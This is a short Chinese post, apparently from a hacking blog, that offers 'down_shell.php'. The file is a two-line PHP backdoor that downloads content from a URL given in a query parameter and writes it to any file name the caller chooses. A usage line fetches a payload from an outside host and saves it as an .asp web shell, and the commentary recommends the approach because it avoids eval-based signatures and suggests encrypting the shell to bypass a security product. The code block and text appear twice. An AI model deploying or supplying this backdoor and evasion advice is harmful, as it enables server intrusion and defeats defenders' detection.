
突破一流拦截的php代码
down_shell.php -可过一流信息拦截
<?php
$str=file_get_contents($_GET[‘url’]);
echo file_put_contents($_GET[‘file’],$str);
?>
use: ?url=http://www.sswowo.com/1.txt&file=3.asp
代码很简单。 为什么都要用EVAL execute 来做后门呢,貌似这样做 也能起到后门的作用。而且不易被特征。
down_shell.php -可过一流信息拦截
<?php
$str=file_get_contents($_GET[‘url’]);
echo file_put_contents($_GET[‘file’],$str);
?>
use: ?url=http://www.sswowo.com/1.txt&file=3.asp
代码很简单。 为什么都要用EVAL execute 来做后门呢,貌似这样做 也能起到后门的作用。而且不易被特征。
但是 难保传上去的shell 不被一流干掉了
加密一下,一般PHP挺好过的。